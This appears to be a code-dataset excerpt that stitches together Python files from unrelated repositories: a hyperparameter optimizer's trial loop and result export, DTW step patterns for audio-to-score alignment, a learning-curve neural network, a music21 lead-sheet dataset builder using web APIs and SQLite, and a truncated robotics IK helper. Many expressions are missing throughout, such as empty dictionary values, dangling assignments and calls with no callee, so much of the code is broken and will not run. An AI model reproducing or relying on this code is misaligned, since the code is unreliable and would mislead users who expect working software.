self.searchConfig['method'] == 'abh': params = self.abhOptimizer.recommendNextParameters(['hyperparameters'], self.results, self.currentTrials) self.lastATPEParameters = self.atpeOptimizer.lastATPEParameters self.lastLockedParameters = self.atpeOptimizer.lastLockedParameters self.atpeParamDetails = self.atpeOptimizer.atpeParamDetails return params def computeCurrentBest(self): best = None bestLoss = None for result in self.results: if (best is None and result['loss'] is not None ) or (result['loss'] is not None and result['loss'] < bestLoss): best = result bestLoss = result['loss'] = best self.bestLoss = bestLoss def startOptmizationJob(self): availableWorkers = list(sorted(self.allWorkers.difference(self.occupiedWorkers))) sampleWorker = availableWorkers[0] sample = None while sample is None: # Hedge against any exceptions in the atpe optimizer. try: sample = self.sampleNext() except Exception: traceback.print_exc() pass def testSample(params, trial, worker): currentTrial = { "start":, "trial": trial, "worker": worker, "params": copy.deepcopy(params) } self.currentTrials.append(currentTrial) start = execution = Execution(['function'], parameters=params, worker_n=worker) modelResult = end = result = Hyperparameter(['hyperparameters']).convertToFlatValues(params) for key in params.keys(): if key.startswith("$"): result[key] = params[key] result['trial'] = trial self.resultsAnalyzer.makeDirs(os.path.join(, "logs")) if 'loss' in modelResult: result['loss'] = modelResult['loss'] elif 'accuracy' in modelResult: result['loss'] = modelResult['accuracy'] if 'status' in modelResult: result['status'] = modelResult['status'] else: result['status'] = 'ok' if 'log' in modelResult: fileName = os.path.join(, "logs", "trial_" + str(trial) + ".txt") with open(fileName, "wt") as file: file.write(modelResult['log']) result['log'] = fileName else: result['log'] = '' if 'error' in modelResult: result['error'] = modelResult['error'] else: result['error'] = '' if 'time' in modelResult: result['time'] = modelResult['time'] else: result['time'] = (end-start).total_seconds() self.currentTrials.remove(currentTrial) return result def onCompletion(worker, future): self.occupiedWorkers.remove(worker) self.results.append(future.result()) self.computeCurrentBest() if not"ui", {}).get("enabled", True): pprint(future.result()) if self.resultsExportFuture is None or (self.resultsExportFuture.done() and len(self.results) > 5): self.resultsExportFuture = self.threadExecutor.submit( lambda: self.outputResultsWithBackup("results", {}).get("graphs", True))) else: self.outputResultsWithBackup(False) if 'hypermax_results' in if self.trialsSinceResultsUpload is None or self.trialsSinceResultsUpload >=['hypermax_results']['upload_frequency']: self.saveResultsToHypermaxResultsRepository() self.trialsSinceResultsUpload = 1 else: self.trialsSinceResultsUpload += 1 self.occupiedWorkers.add(sampleWorker) sampleFuture = self.threadExecutor.submit(testSample, sample, self.trialNumber, sampleWorker) sampleFuture.add_done_callback(functools.partial(onCompletion, sampleWorker)) self.trialNumber += 1 return sampleFuture def runOptimizationThread(self): self.thread.start() def outputResultsWithBackup(self, graphs, workers=1): self.resultsAnalyzer.outputResultsFolder(self, graphs, workers=workers) directory_head, directory_tail = os.path.split( backup_directory = os.path.join(directory_head, ".backup_" + directory_tail + "~") self.resultsAnalyzer.outputResultsFolder(self, graphs, directory=backup_directory, workers=workers) def optimizationThread(self): # Make sure we output basic results if the process is killed for some reason. atexit.register(lambda: self.outputResultsWithBackup(False)) futures = [] for worker in range(min(len(self.allWorkers), self.totalTrials - len(self.results))): futures.append(self.startOptmizationJob()) time.sleep(1.0) while (len(self.results) + len(self.currentTrials)) < self.totalTrials: completedFuture = list(concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)[0])[0] futures.remove(completedFuture) time.sleep(0.05) futures.append(self.startOptmizationJob()) concurrent.futures.wait(futures) # We are completed, so we can allocate a full contingent of workers self.outputResultsWithBackup(True, workers=4) def exportGuidanceJSON(self, fileName): with open(fileName, 'wt') as file: json.dump(self.humanGuidedATPEOptimizer.guidanceOptions, file, indent=4, sort_keys=True) def importGuidanceJSON(self, fileName): with open(fileName, 'rt') as file: self.humanGuidedATPEOptimizer.guidanceOptions = json.load(file) def exportResultsCSV(self, fileName): allKeys = set() for result in self.results: for key in result: allKeys.add(key) fieldNames = self.resultInformationKeys + sorted(allKeys.difference(set(self.resultInformationKeys))) # Make sure we keep the order of the field names consistent when writing the csv with open(fileName, 'wt') as file: writer = csv.DictWriter(file, fieldnames=fieldNames if len(self.results) > 0 else [], dialect='unix') writer.writeheader() writer.writerows(self.results) def importResultsCSV(self, fileName): with open(fileName) as file: reader = csv.DictReader(file) results = list(reader) newResults = [] for result in results: newResult = {} for key,value in result.items(): if value is not None and value != "": try: if '.' in value or 'e' in value: newResult[key] = float(value) else: newResult[key] = int(value) except ValueError: newResult[key] = value elif key == 'loss': newResult[key] = None elif key == 'log': newResult[key] = '' else: newResult[key] = None newResults.append(newResult) self.results = newResults self.computeCurrentBest() self.trialNumber = len(self.results) def saveResultsToHypermaxResultsRepository(self): try: hypermaxResultsConfig =['hypermax_results'] with tempfile.TemporaryDirectory() as directory: process =['git', 'clone', '<EMAIL>:electricbrainio/hypermax-results.git'], cwd=directory, stdout=subprocess.PIPE, stderr=subprocess.PIPE) hypermaxResultsDirectory = os.path.join(directory, 'hypermax-results', hypermaxResultsConfig['name']) self.resultsAnalyzer.outputResultsFolder(self, detailed=False, directory=hypermaxResultsDirectory) with open(os.path.join(hypermaxResultsDirectory, "metadata.json"), 'wt') as file: json.dump(['hypermax_results'], file, indent=4) process =['git', 'add', hypermaxResultsDirectory], cwd=os.path.join(directory, 'hypermax-results')) process =['git', 'commit', '-m', 'Hypermax automatically storing results for model ' + hypermaxResultsConfig['name'] + ' with ' + str(len(self.results)) + " trials."], cwd=os.path.join(directory, 'hypermax-results'), stdout=subprocess.PIPE, stderr=subprocess.PIPE) process =['git push'], cwd=os.path.join(directory, 'hypermax-results'), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) except Exception as e: print(e) ```
{ "source": "00sapo/MMSP2021-Audio2ScoreAlignment", "score": 3 }
#### File: MMSP2021-Audio2ScoreAlignment/alignment/ ```python from math import floor from typing import Callable import numpy as np import as px from dtw import stepPattern as sp # yapf: disable # DTW #: a symmetric pattern for DTW symmetric = sp.StepPattern( sp._c( # diagonal 1, 1, 1, -1, 1, 0, 0, 3, # vertical 2, 1, 0, -1, 2, 0, 0, 2, # horizontal 3, 0, 1, -1, 3, 0, 0, 2, # 1 vertical + diagonal 4, 2, 1, -1, 4, 1, 0, 2, 4, 0, 0, 2, # 1 horizontal + diagonal 5, 1, 2, -1, 5, 0, 1, 2, 5, 0, 0, 2, ), "NA") #: an asymmetric pattern which favours the horizontal paths (changing column is #: easier than changing row) asymmetric_hor = sp.StepPattern( sp._c( # diagonal 1, 1, 1, -1, 1, 0, 0, 3, # vertical 2, 1, 0, -1, 2, 0, 0, 2, # horizontal 3, 0, 1, -1, 3, 0, 0, 1, # 1 vertical + diagonal 4, 2, 1, -1, 4, 1, 0, 2, 4, 0, 0, 2, # 1 horizontal + diagonal 5, 1, 2, -1, 5, 0, 1, 2, 5, 0, 0, 1, ), "NA") #: an asymmetric pattern which favours the vertical paths (changing row is #: easier than changing column) asymmetric_ver = sp.StepPattern( sp._c( # diagonal 1, 1, 1, -1, 1, 0, 0, 3, # vertical 2, 1, 0, -1, 2, 0, 0, 1, # horizontal 3, 0, 1, -1, 3, 0, 0, 2, # 1 vertical + diagonal 4, 2, 1, -1, 4, 1, 0, 2, 4, 0, 0, 1, # 1 horizontal + diagonal 5, 1, 2, -1, 5, 0, 1, 2, 5, 0, 0, 2, ), "NA") #: an asymmetric pattern which favours the vertical paths (changing row is #: easier than changing column); this is like dtw.stepPattern.asymmetric, but #: that one favours horizontal paths asymmetric1 = sp.StepPattern( sp._c( # diagonal 1, 1, 1, -1, 1, 0, 0, 1, # vertical 2, 0, 1, -1, 2, 0, 0, 1, # second diagonal 3, 2, 1, -1, 3, 0, 0, 1 ), "N") # yapf: enable symmetric1 = sp.symmetric1 symmetric2 = sp.symmetric2 asymmetric2 = sp.asymmetric step_patterns = ( asymmetric_hor, asymmetric_ver, symmetric, symmetric1, symmetric2, asymmetric1, asymmetric2, ) def avg_dist(dist: Callable, dist_args: dict): def new_dist(x: list, y: list): out = 0 for i in range(len(x)): out += dist(x[i], y[i], **dist_args) return out / len(x) return new_dist def idx_range(idx, radius, length): """ given an idx, a radius and a maximum length, returns starting and ending indices of a a window centered at that idx and having that radius, without indices > length nor < 0 """ return max(0, idx - radius), min(length, idx + radius + 1) class FedeWindow(object): """ A windowing function which computes a different slanted-band at each point based on the local difference of the main slanted diagonal; the local radius is computed as: `max( min_radius, floor( alpha * avg_dist_fn( x[i - beta : i + beta], y[j - beta : j + beta] ) ) )` where: * N is the length of x * M is the length of y * avg_dist_fn is the average of dist_fn on each corresponding sample * j = floor(i * M / N) By words, `beta` is half the length of a sliding window used to compute distances between excerpts of `x` and `y` taken along the slanted diagonal. The distance is multiplied by `alpha` to get the local radius length. `x` and `y` are sequences with shape ([M, N], features) """ def __init__(self, x, y, dist_fn: Callable, alpha=5, beta=5, min_radius=5, dist_args: dict = {}): self.alpha = alpha self.beta = beta self.min_radius = min_radius self.dist_fn = avg_dist(dist_fn, dist_args) self.compute_mask(x, y) def compute_mask(self, x, y): # take the distance function N = len(x) M = len(y) transpose = False if M > N: # x should always be longer than y x, y = y, x N, M = M, N # if we swap x and y, we need to swap the mask too transpose = True # a mask to remember points self.mask = np.zeros((len(x), len(y)), dtype=np.bool8) # for each point in x for i in range(N): # compute the point in y along the diagonal j = floor(i * M / N) # compute the sliding windows start_x, end_x = idx_range(i, self.beta, N) start_y, end_y = idx_range(j, self.beta, M) _x = x[start_x:end_x] _y = y[start_y:end_y] # pad the windows if start_x == 0: _x = [[0]] * (self.beta - i) + _x elif end_x == N: _x = _x + [[0]] * (i + self.beta - N) if start_y == 0: _y = [[0]] * (self.beta - j) + _y elif end_y == M: _y = _y + [[0]] * (j + self.beta - M) # compute the local radius lr = max(self.min_radius, floor(self.alpha * self.dist_fn(_x, _y))) # set the points inside the local radius to True self.mask[slice(*idx_range(i, lr, N)), slice(*idx_range(j, lr, M))] = True if transpose: self.mask = self.mask.T def __call__(self, i, j, query_size=None, reference_size=None): return self.mask[i, j] def plot(self): """ Return a plotly Figure object representing the heatmap of the mask """ return px.imshow(self.mask, aspect='auto') def _remove_conflicting_match(arr_x: np.ndarray, arr_y: np.ndarray, graph_matrix: np.ndarray, target: int): """ 1. look for repeated values in `arr_x` or `arr_y`, depending on `target` 2. look for the maximum value in `graph_matrix[1]`, at the indices in `arr_x` and `arr_y` relative to the repeated values 3. among the repeated values in the target, chose the ones corresponding to the maximum in `graps_matrix[1]` 4. return `arr_x` and `arr_y` without the removed indices """ if target == 0: _target = arr_x elif target == 1: _target = arr_y else: raise RuntimeError(f"`target` should be 0 or 1, used {target} instead") arr_mask = np.ones(_target.shape[0], dtype=np.bool8) unique_vals, unique_count = np.unique(_target, return_counts=True) for unique_val in unique_vals[unique_count > 1]: conflicting_idx = np.nonzero(_target == unique_val)[0] to_keep_idx_of_idx = np.argmax(graph_matrix[1, arr_x[conflicting_idx], arr_y[conflicting_idx]]) arr_mask[conflicting_idx] = 0 arr_mask[conflicting_idx[to_keep_idx_of_idx]] = 1 return arr_x[arr_mask], arr_y[arr_mask] def merge_matching_indices(args): """ Takes a list of mapping indices, fills the graph matrix counting the number of times a match happens in the mappings. Then start taking matching from the most matched and iteratively adding new matching. If two conflicting matching have the same number of counts, takes the matching which appears in the longest mapping; in case of parity the first one is taken """ # creating the matrix num_notes = np.max([arg[:, 0].max() for arg in args]) + 1, np.max( [arg[:, 1].max() for arg in args]) + 1 # dim 0 records the counts, dim 1 records the most long mapping containing # the matching graph_matrix = np.zeros((2, num_notes[0], num_notes[1]), dtype=np.int64) # filling the matrix for arg in args: # the count graph_matrix[0, arg[:, 0], arg[:, 1]] += 1 # the length L = arg.shape[0] graph_matrix[1, arg[:, 0], arg[:, 1]] = np.maximum( graph_matrix[1, arg[:, 0], arg[:, 1]], L) # merging # two indices which records references to the original matrix index_rows = np.arange(num_notes[0]) index_cols = np.arange(num_notes[1]) merged = [] for k in range(len(args), 0, -1): # take matchings that appear `k` times candidates_row, candidates_col = np.nonzero(graph_matrix[0] == k) # remove conflicting candidates candidates_row, candidates_col = _remove_conflicting_match( candidates_row, candidates_col, graph_matrix, 0) candidates_row, candidates_col = _remove_conflicting_match( candidates_row, candidates_col, graph_matrix, 1) # add candidates to the output merged.append( np.stack([index_rows[candidates_row], index_cols[candidates_col]], axis=1)) # remove matched notes from graph_matrix mask_rows = np.ones(graph_matrix.shape[1], dtype=np.bool8) mask_cols = np.ones(graph_matrix.shape[2], dtype=np.bool8) mask_rows[candidates_row] = 0 mask_cols[candidates_col] = 0 graph_matrix = graph_matrix[:, mask_rows] graph_matrix = graph_matrix[:, :, mask_cols] # remove matched notes from the index index_rows = index_rows[mask_rows] index_cols = index_cols[mask_cols] # re-sort everything and return merged = np.concatenate(merged, axis=0) # print(f"Added notes from merging: {len(ref) - L}") return merged[merged[:, 0].argsort()] ``` #### File: alignment/pybnn_module/ ```python from copy import deepcopy import numpy as np import torch import torch.nn as nn from pybnn.bohamiann import Bohamiann from pybnn.util.layers import AppendLayer def vapor_pressure(x, a, b, c, *args): b_ = (b + 1) / 2 / 10 a_ = (a + 1) / 2 c_ = (c + 1) / 2 / 10 return torch.exp(-a_ - b_ / (x + 1e-5) - c_ * torch.log(x)) - (torch.exp(a_ + b_)) def log_func(t, a, b, c, *args): a_ = (a + 1) / 2 * 5 b_ = (b + 1) / 2 c_ = (c + 1) / 2 * 10 return (c_ + a_ * torch.log(b_ * t + 1e-10)) / 10. def hill_3(x, a, b, c, *args): a_ = (a + 1) / 2 b_ = (b + 1) / 2 c_ = (c + 1) / 2 / 100 return a_ * (1. / ((c_ / x + 1e-5) ** b_ + 1.)) def bf_layer(theta, t): y_a = vapor_pressure(t, theta[:, 0], theta[:, 1], theta[:, 2]) y_b = log_func(t, theta[:, 3], theta[:, 4], theta[:, 5]) y_c = hill_3(t, theta[:, 6], theta[:, 7], theta[:, 8]) return torch.stack([y_a, y_b, y_c], dim=1) def get_lc_net_architecture(input_dimensionality: int) -> torch.nn.Module: class Architecture(nn.Module): def __init__(self, n_inputs, n_hidden=50): super(Architecture, self).__init__() self.fc1 = nn.Linear(n_inputs - 1, n_hidden) self.fc2 = nn.Linear(n_hidden, n_hidden) self.fc3 = nn.Linear(n_hidden, n_hidden) self.theta_layer = nn.Linear(n_hidden, 9) self.weight_layer = nn.Linear(n_hidden, 3) self.asymptotic_layer = nn.Linear(n_hidden, 1) self.sigma_layer = AppendLayer(noise=1e-3) def forward(self, input): x = input[:, :-1] t = input[:, -1] x = torch.tanh(self.fc1(x)) x = torch.tanh(self.fc2(x)) x = torch.tanh(self.fc3(x)) theta = torch.tanh(self.theta_layer(x)) bf = bf_layer(theta, t) weights = torch.softmax(self.weight_layer(x), -1) residual = torch.tanh(torch.sum(bf * weights, dim=(1,), keepdim=True)) asymptotic = torch.sigmoid(self.asymptotic_layer(x)) mean = residual + asymptotic return self.sigma_layer(mean) return Architecture(n_inputs=input_dimensionality) class LCNet(Bohamiann): def __init__(self, **kwargs) -> None: super(LCNet, self).__init__(get_network=get_lc_net_architecture, normalize_input=True, normalize_output=False, **kwargs) @staticmethod def normalize_input(x, m=None, s=None): if m is None: m = np.mean(x, axis=0) if s is None: s = np.std(x, axis=0) x_norm = deepcopy(x) x_norm[:, :-1] = (x[:, :-1] - m[:-1]) / s[:-1] return x_norm, m, s ```
{ "source": "00sapo/OpenEWLD", "score": 3 }
#### File: 00sapo/OpenEWLD/ ```python import time import argparse import csv import json import operator import os import sys import traceback import zipfile import sqlite3 from collections import defaultdict from typing import List, Dict import discogs_client import requests from music21 import converter, stream, note, chord, text, musicxml, features, key, harmony def detectGenres(query: str, depth: int, num_of_items: int, client: discogs_client.Client)-> List: """ detect genres using discogs client. :depth: number of song to be used :num_of_items: number of items in the list returned :d: discogs client object :returns: list of list of tuples: [ [(genre1, occurrences), (genre2, occurrences), ...], [(style1, occurrences), (style2, occurrences), ...] ] """ r =, type='release') r = r.sort('year') # populate genres_stats list genres_stats = defaultdict(int) styles_stats = defaultdict(int) r.per_page = depth l = for release in l: genres = release.fetch('genre') if genres is not None: for k in genres: genres_stats[k] += 1 if release.styles is not None: for k in release.styles: styles_stats[k] += 1 genres = [] styles = [] if len(genres_stats) > 0: twoMostCommon(num_of_items, genres_stats, genres) if len(styles_stats) > 0: twoMostCommon(num_of_items, styles_stats, styles) return [genres, styles] def twoMostCommon(num_of_items, dictionary, listOfTuples): for i in range(num_of_items): if i < len(dictionary): most_common_tuple = max(dictionary.items(), key=operator.itemgetter(1)) dictionary.pop(most_common_tuple[0]) listOfTuples.append(most_common_tuple) def getComposerInfoByUri(uri: str) -> Dict: """:returns: same as @getComposerInfoByName""" r = requests.get(uri, params={'format': 'json'}) data = json.loads(r.text) if checkingErrors(data): return getComposerInfoByUri(uri) composer = { 'correct_name': data.get('commonName'), 'home_country': data.get('homeCountry'), 'birth': formatDate(data.get('birthDate')), 'death': formatDate(data.get('deathDate')) } return composer def getComposerInfoByName(name: str) -> Dict: """ :retuns: a dictionary containing the birth date, the death date, the actual name and the nationality of the composer """ url = '' params = { 'format': 'json', 'commonName': name } resp = requests.get(url=url, params=params) data = json.loads(resp.text) if checkingErrors(data): return getComposerInfoByName(name) if len(data.get('resultPage') or '') == 0: return None artist_page = data['resultPage'][0]['uri'] return getComposerInfoByUri(artist_page) def formatDate(date) -> str: if date is None: return None tokens = str(date).split('-', 3) returned = '' if len(tokens) == 1: returned = tokens[0] + '-00-00' elif len(tokens) == 2: returned = tokens[0] + '-' + tokens[1] + '-00' else: returned = tokens[0] + '-' + tokens[1] + '-' + tokens[2] return returned def getWorkInfo(title: str, composer: str) -> Dict: """ :returns: a dict with work info """ url = '' params = { 'format': 'json', 'credits': composer, 'title': title } resp = requests.get(url=url, params=params) data = json.loads(resp.text) if checkingErrors(data): return getWorkInfo(title, composer) if len(data.get('resultPage') or '') == 0: return None work_page = data['resultPage'][0]['uri'] r = requests.get(work_page, params={'format': 'json'}) data = json.loads(r.text) if checkingErrors(data): return getWorkInfo(title, composer) all_authors = [] for i in data.get('credits'): all_authors.append(i.get('uri')) work = { 'language': data.get('language'), 'correct_title': data.get('title'), 'correct_credits_uri': all_authors, } if data.get('original') is not None: original_performance_page = data['original'].get('uri') r = requests.get(original_performance_page, params={'format': 'json'}) data = json.loads(r.text) if checkingErrors(data): return getWorkInfo(title, composer) work['original_performance_date'] = formatDate(data.get('date')) else: work['original_performance_date'] = None return work def getTonality(score: stream.Score)-> key.Key: """ :returns: a key.Key object representing tonality detected by Krumhanslschumckler algorithm, only if its 'tonalCertainty()' is >= 0.9, None otherwise """ try: estimated = score.analyze('key.krumhanslschmuckler') except Exception: return None if estimated.tonalCertainty() < 0.9: return None else: return estimated def scoreIsCompatible(s: stream.Score) -> bool: """ parse a s and returs True if it is compatible with our symbolic representation system This also sets the 'timeSignature', 'keySignature', 'incipitType' and 'hasTriplets' in compatible stream.Score objects """ # no multiple voices are allowed print('checking compatibility...') sc = s.explode() # only one part is allowed print('\tchecking parts (only one allowed)...') if hasattr(sc, 'parts'): if len( > 1: return False # only one key signature is allowed print('\tchecking key signatures (only one allowed)...') signatures = s.flat.getKeySignatures() if len(signatures) > 1: for signature in signatures: if signature.asKey().name != signatures[0].asKey().name: return False # looking for the right tonality estimated = getTonality(s) if estimated is not None: s.keySignature = estimated.asKey() elif len(signatures) == 0: return False else: s.keySignature = signatures[0].asKey() # only one time signature is allowed print('\tchecking time signatures (only one allowed)...') signatures = s.flat.getTimeSignatures() if len(signatures) > 1: for signature in signatures: if signature.ratioString != signatures[0].ratioString: return False elif len(signatures) == 0: return False measure_length = signatures[0].numerator / signatures[0].denominator * 4 s.timeSignature = signatures[0] # no multiple white measures in incipit # setting incipit type print('\tchecking no multiple white measures at the beginning...') for m in s.recurse().getElementsByClass(stream.Measure): if len(m.recurse().getElementsByClass(note.Note)) == 0: m.containerHierarchy()[0].remove(m) else: n = m.recurse().getElementsByClass(note.Note)[0] if n.offset > 0: s.incipitType = 'acefalo' elif m.duration.quarterLength < measure_length: s.incipitType = 'anacrusi' else: s.incipitType = 'tetico' break # no multiple white measures at the end print('\tchecking no multiple white measures at the end...') it = s.recurse().getElementsByClass(stream.Measure) for m in reversed(it): if len(m.recurse().getElementsByClass(note.Note)) == 0: m.containerHierarchy()[0].remove(m) else: break print('\tchecking triplets and chords...') s.hasTriplets = False noChordSymbol = True it = s.flat.notesAndRests i = 0 while i < len(it): n = it[i] if type(n) is harmony.ChordSymbol: noChordSymbol = False i += 1 continue # no written chords allowed if type(n) is chord.Chord: print('----Chords are not allowed----') return False # triplets checking: if len(n.duration.tuplets) > 0: tuplet = n.duration.tuplets[0] # only triplets are allowed if tuplet.numberNotesActual > 3: print('----Only triplets are allowed----') return False # the following is to check the nesting level if tuplet.nestedLevel > 1: print('----only one nested level is allowed----') return False # only if it is contained in one measure if tuplet.totalTupletLength() > measure_length: print('----tuplets are allowed only in the same measure----') return False s.hasTriplets = True i += 3 else: i += 1 if noChordSymbol: print('----No chords annotated----') return False return True def copyToDir(s: stream.Score, dir: str): path = os.path.join(dir, s.metadata.composer + '-' + s.metadata.title + '.xml') s.write(fp=path) def fixStrangeCharacters(title, composer): composer = composer.translate( {ord(c): " " for c in "!@#$%^&*()[]{};:,./<>?\|~-=_+"}) composer = composer.translate( {ord(c): "'" for c in "`"}) title = title.translate( {ord(c): " " for c in "@#$%^&*()[]{};:./<>\|~-=_+"}) title = title.translate( {ord(c): "'" for c in "`"}) return title, composer def writeCompressedMxl(xml: str, filename_without_extension: str, filepath_without_extension: str): zf = zipfile.ZipFile(filepath_without_extension + '.mxl', mode='w', compression=zipfile.ZIP_DEFLATED) zi = zipfile.ZipInfo('META-INF' + os.sep + 'container.xml') zi.external_attr = 0o660 << 16 zf.writestr(zi, "<?xml version='1.0' encoding='UTF-8'?>" "<container><rootfiles><rootfile full-path='{0}.xml'/>" "</rootfiles></container>".format(filename_without_extension)) zi = zipfile.ZipInfo(filename_without_extension + '.xml') zi.compress_type = zipfile.ZIP_DEFLATED zi.external_attr = 0o660 << 16 zf.writestr(zi, xml) zf.close() def checkingErrors(response: Dict): # checking errors error = response.get('error') if error is not None: if error.get('code') == 10007: print('too many requests... wait a bit and retry') time.sleep(30) return True return False def secondHandSongsInfo(s: stream.Score): """ Queries to gather work and composers info :returns: a list containing work and composers dictionaries """ title = s.metadata.title composer = s.metadata.composer if title == '' or title is None or composer == '' or composer is None: return {}, [] # removing strange characters title, composer = fixStrangeCharacters(title, composer) # trying to get work info print('querying for work and artists info...') work = getWorkInfo(title, composer) if work is None: author = getComposerInfoByName(composer) if author is not None: work = getWorkInfo(title, author) if work is None: work = getWorkInfo(title, composer.split(None, 1)[0]) if work is None: work = getWorkInfo(title, '') if work is None: return {}, [] # trying to get composers info composers = [] for uri in work.get('correct_credits_uri'): composers.append(getComposerInfoByUri(uri)) return work, composers def collectData(s: stream.Score, new_dataset_dir: str, id: int, filename: str): """ :returns: a dictionary containing 'name of table': 'entry as tuple' or None if it is untreatable """ # collecting data print('collecting data...') work, composers = secondHandSongsInfo(s) if 'correct_title' in work and len(composers) > 0: # getting genres and styles print('querying discogs for genre detection...') discogs_query = work.get('correct_title') or '' for c in composers: correct_name = c.get('correct_name') or '' discogs_query += ' ' + correct_name if discogs_query == '': genres = styles = [] else: genres, styles = detectGenres( discogs_query, depth=5, num_of_items=2, client=d) else: genres = styles = [] composers.append({'correct_name': '[Unknown]'}) if s.metadata.title != '': work['correct_title'] = s.metadata.title else: work['correct_title'] = filename.split( '_-_', 1)[-1].replace('_', ' ') # lyrics print('writing lyrics and leadsheet...') lyrics = text.assembleAllLyrics(s).replace('\n', '') # computing file name output_dir = '' for c in composers: correct_name = c.get('correct_name') or '' output_dir += correct_name + '-' correct_title = work.get( 'correct_title').replace(' ', '_').replace('/', '-') output_dir = output_dir[:-1].replace(' ', '_') output_dir = os.path.join( new_dataset_dir, output_dir, correct_title) if not os.path.exists(output_dir): os.makedirs(output_dir) output_path = os.path.join(output_dir, correct_title) # writing lyrics file with open(output_path + ".txt", "w") as lyrics_file: print(lyrics, file=lyrics_file) first_measure = s.recurse().getElementsByClass(stream.Measure)[0].number s.measure(first_measure).timeSignature = s.timeSignature s.measure(first_measure).keySignature = s.keySignature # creating xml string (out is bytes in Py3) xml = musicxml.m21ToXml.GeneralObjectExporter(s).parse().decode('utf-8') # writing musicxml compressed file writeCompressedMxl(xml, work['correct_title'], output_path) # getting all features print('computing features...') f = features.base.allFeaturesAsList(s) # writing features csv # use features.base.getIndex('name') to get the row index of a certain # feature, or something like [ for x in features.extractorsById('all')] # to get the feature id at the same index position as in the csv print('writing features...') with open(output_path + '.csv', 'a') as features_file: writer = csv.writer(features_file) writer.writerows(f[0]) writer.writerows(f[1]) # creating output dictionary data = createDataDictionary( id, work, output_path, s, genres, styles, composers) return data def createDataDictionary(id, work, output_path, s, genres, styles, composers): data = { 'works': [(id, work.get('correct_title'), work.get('original_performance_date'), work.get('language'), output_path + '.txt', output_path + '.mxl')], 'features': [(id, s.timeSignature.ratioString,, s.incipitType, s.hasTriplets, output_path + '.csv')], 'authors': [], 'work_genres': [], 'work_style': [], 'work_author': [] } for genre in genres: data['work_genres'].append((id, genre[0], genre[1])) for style in styles: data['work_style'].append((id, style[0], style[1])) for composer in composers: # here 'correct_name' is used twice because the second is needed to # check that this author is not already inserted data['authors'].append((composer.get('correct_name'), composer.get('birth'), composer.get('death'), composer.get( 'home_country'), composer.get('correct_name'))) data['work_author'].append((id, composer.get('correct_name'))) return data class DBInterface(): """ A class to interface to the SQLite Database """ temp_data = { 'works': [], 'features': [], 'authors': [], 'work_author': [], 'work_genres': [], 'work_style': [] } counter = 0 def firstIndex(self): """ get the first available index of a work """ self.cursor.execute('select max(id) from works') i = self.cursor.fetchone()[0] if i is not None: i += 1 else: i = 0 return i def __enter__(self): pass def __exit__(self, exc_type, exc_val, exc_tb): pass def __init__(self, path_to_db): """ creates a new db at :path_to_db address using file named 'db_creation.sql' as starting point """ try: self.connection = sqlite3.connect(path_to_db) self.cursor = self.connection.cursor() print("Reading SQL Script...") scriptfilename = 'db_creation.sql' scriptFile = open(scriptfilename, 'r') script = scriptFile.close() self.cursor.executescript(script) self.connection.commit() except Exception: print("can't create db... exiting") traceback.print_exc() sys.exit(3) def addToDB(self, data): """ add data to the database """ for k in data.keys(): self.temp_data[k] += data[k] self.counter += 1 if self.counter == 10: self.__commitData() self.counter = 0 def __commitData(self): print("____________ WRITING DATA TO DB _____________") self.cursor.executemany( 'INSERT INTO works VALUES (?, ?, ?, ?, ?, ?)', self.temp_data['works']) self.cursor.executemany( 'INSERT INTO authors SELECT ?, ?, ?, ? WHERE NOT EXISTS \ (SELECT 1 FROM authors WHERE common_name = ?)', self.temp_data['authors']) self.cursor.executemany( 'INSERT INTO features VALUES (?, ?, ?, ?, ?, ?)', self.temp_data['features']) self.cursor.executemany( 'INSERT INTO work_author VALUES (?, ?)', self.temp_data['work_author']) self.cursor.executemany( 'INSERT INTO work_genres VALUES (?, ?, ?)', self.temp_data['work_genres']) self.cursor.executemany( 'INSERT INTO work_style VALUES (?, ?, ?)', self.temp_data['work_style']) try: self.connection.commit() except Exception: print("can't write to db... exiting") traceback.print_exc() sys.exit(3) for k in self.temp_data.keys(): self.temp_data[k] = [] def __del__(self): self.__commitData() self.connection.close() def main(dbManager): # loading file names parser = argparse.ArgumentParser() parser.add_argument("--dir", "-d", type=str, required=True) args = parser.parse_args() if not os.path.isdir(args.dir): print('Directory ' + args.dir + ' does not exists!') sys.exit(2) new_dataset_dir = 'dataset' if not os.path.exists(new_dataset_dir): os.makedirs(new_dataset_dir) filenames = os.listdir(args.dir) exception_dir = 'exception_dir' if not os.path.exists(exception_dir): os.makedirs(exception_dir) not_compatible_dir = 'not_compatible' if not os.path.exists(not_compatible_dir): os.makedirs(not_compatible_dir) id = dbManager.firstIndex() for filename in filenames: print('------------------------------------') print('analysing ' + filename) # opening file pathname = os.path.join(args.dir, filename) if not os.path.isfile(pathname): continue s = None try: s = converter.parse(pathname) except KeyboardInterrupt: return except Exception: print('invalid file' + pathname) continue try: if scoreIsCompatible(s): data = collectData(s, new_dataset_dir, id, filename) if data is None: composer_title_unknown_dir = 'unknown' if not os.path.exists(composer_title_unknown_dir): os.makedirs(composer_title_unknown_dir) copyToDir(s, composer_title_unknown_dir) else: id += 1 print('adding score number ', id) dbManager.addToDB(data) os.remove(pathname) else: os.remove(pathname) except Exception as e: log_filename = os.path.join(exception_dir, filename) s.write(fp=log_filename + '.xml') with open(log_filename + ".log", "w") as log_file: print(traceback.format_exc(), file=log_file) d = discogs_client.Client( 'SMC application', user_token="<KEY>") dbManager = DBInterface('EWLD.db') main(dbManager) del dbManager ```
{ "source": "00schen/asha", "score": 2 }
#### File: assistive_gym/envs/ ```python import numpy as np import pybullet as p class Util: def __init__(self, pid, np_random): = pid self.ik_lower_limits = {} self.ik_upper_limits = {} self.ik_joint_ranges = {} self.ik_rest_poses = {} self.np_random = np_random def ik_random_restarts(self, body, target_joint, target_pos, target_orient, world_creation, robot_arm_joint_indices, robot_lower_limits, robot_upper_limits, best_ik_joints = None, ik_indices=range(29, 29+7), max_iterations=1000, max_ik_random_restarts=50, random_restart_threshold=0.01, half_range=False, step_sim=False, check_env_collisions=False): orient_orig = target_orient best_ik_distance = 0 for r in range(max_ik_random_restarts): target_joint_positions = self.ik(body, target_joint, target_pos, target_orient, mean_rest_pose=best_ik_joints, ik_indices=ik_indices, max_iterations=max_iterations, half_range=half_range) world_creation.setup_robot_joints(body, robot_arm_joint_indices, robot_lower_limits, robot_upper_limits, randomize_joint_positions=False, default_positions=np.array(target_joint_positions), tool=None) if step_sim: for _ in range(5): p.stepSimulation( if len(p.getContactPoints(bodyA=body, bodyB=body, > 0 and 